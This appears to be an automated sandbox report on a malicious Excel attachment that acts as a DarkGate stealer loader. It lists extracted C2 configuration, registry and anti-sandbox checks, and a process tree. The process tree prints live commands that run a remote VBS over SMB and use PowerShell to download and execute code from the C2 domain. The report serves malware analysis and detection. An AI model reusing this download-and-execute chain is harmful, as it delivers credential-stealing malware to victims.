Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-03-2024 07:52
Static task
static1
Behavioral task
behavioral1
Sample
re-march-26-2024-9794.xlsx
Resource
win7-20240221-en
General
-
Target
re-march-26-2024-9794.xlsx
-
Size
65KB
-
MD5
af440ea16bf075f844e20296bba223cd
-
SHA1
dfa83aba0e634dfc83ff1f7a8cff6f334be7ac8d
-
SHA256
63d68e0bb8e196c50e60df65fbd50eabbc21857cb1af6d3efab22c3bf44995ff
-
SHA512
bf05569ecbafcad7eed5624153156d117bf1a9eb6921ef54ca65a7375169d231b4f883a4243a7634d97490c4fa058ae76016e5728eb70486c2d0a3882d45723b
-
SSDEEP
1536:VvAi3OnslDGe2eGyIvJhaaO5Ny4iUvRB75d/wSgE9pgyjxOqTU:JlOsj4yIRAzHiE/7n/tgE9pgyjxi
Malware Config
Extracted
darkgate
admin888
backupitfirst.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
SfUQxDje
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/4388-72-0x0000000003150000-0x00000000031C3000-memory.dmp family_darkgate_v6 behavioral2/memory/4388-74-0x0000000003150000-0x00000000031C3000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4340 4844 WScript.exe 87 -
Blocklisted process makes network request 4 IoCs
flow pid Process 73 3788 powershell.exe 77 3788 powershell.exe 84 3788 powershell.exe 91 3788 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 4388 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4844 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3788 powershell.exe 3788 powershell.exe 3788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3788 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4844 EXCEL.EXE 4844 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE 4844 EXCEL.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4844 wrote to memory of 4340 4844 EXCEL.EXE 101 PID 4844 wrote to memory of 4340 4844 EXCEL.EXE 101 PID 4340 wrote to memory of 3788 4340 WScript.exe 102 PID 4340 wrote to memory of 3788 4340 WScript.exe 102 PID 3788 wrote to memory of 4388 3788 powershell.exe 107 PID 3788 wrote to memory of 4388 3788 powershell.exe 107 PID 3788 wrote to memory of 4388 3788 powershell.exe 107 PID 3788 wrote to memory of 3576 3788 powershell.exe 108 PID 3788 wrote to memory of 3576 3788 powershell.exe 108 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3576 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\re-march-26-2024-9794.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\170.130.55.130\share\a\Report-26-2024.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'backupitfirst.com/rudxfiyb')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\rqzo\AutoHotkey.exe"C:\rqzo\AutoHotkey.exe" C:/rqzo/script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4388
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rqzo/4⤵
- Views/modifies file attributes
PID:3576
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
56KB
MD5cc881012bc30b053b9e6b763f4fff1ed
SHA1ac366539edd526b083f630828090a519812f72f9
SHA25608037bf46f2e4d7654b2f4d9073ed9eababb35b538927dcae5ed665ad7b4e1c6
SHA5123c520d67cfc7d12f96577cf29c373ebe68dafc59f68fc5dd7d6b772944dbe40a01836f51b87c83486adb751b9b293609d768d7b151614845da13e58d9c2c647d
-
Filesize
916KB
MD55c3a3407c64b7585324a29a08005a3a8
SHA1956a7788aa0e397e973ab5623d4aae73b1ca2658
SHA25689445e407e345c8c4a8606210787957db44c4ec1acec6a17dfe7e78203f4ca40
SHA512fe13844cff959a87523246f85cf357fd1adcdcffdc8b603f28ec26f4dcb2f26b76f243a042a7c2089776a737e3f7578214709ebc97eed7849e4c56e4825cbecb